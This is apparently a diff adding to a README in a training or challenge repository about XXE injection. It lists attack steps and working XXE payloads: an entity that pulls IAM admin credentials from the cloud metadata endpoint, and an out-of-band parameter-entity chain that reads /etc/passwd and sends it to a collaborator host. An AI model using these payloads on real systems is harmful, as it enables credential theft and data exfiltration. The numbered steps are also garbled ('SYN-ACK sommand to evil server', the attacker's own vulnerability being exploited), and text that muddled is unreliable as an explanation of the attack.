CODIFy20/CORS/README.md

 2) Server sends SYN-ACK sommand to evil server.
 3) XXE payload is injected and sent to the genuine server that asks for c:/windows/win.ini
 4) XXE vulnerablity of attacker is exploited.

+# Payloads Used
+1) To obtain admin credentials: <!DOCTYPE test [ <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/admin"> ]>
+2) To test random credentials:  <!ENTITY % file SYSTEM "file:///etc/passwd">
+<!ENTITY % eval "<!ENTITY &#x25; test SYSTEM 'http://burp-collaborator/?a=%file;'>">
+%eval;
+%test;

+#Impact
+XXE injection vulnerablity basically works on data in use and transit data.
+It can cause the loss of sensitive info of an organisation or an individual.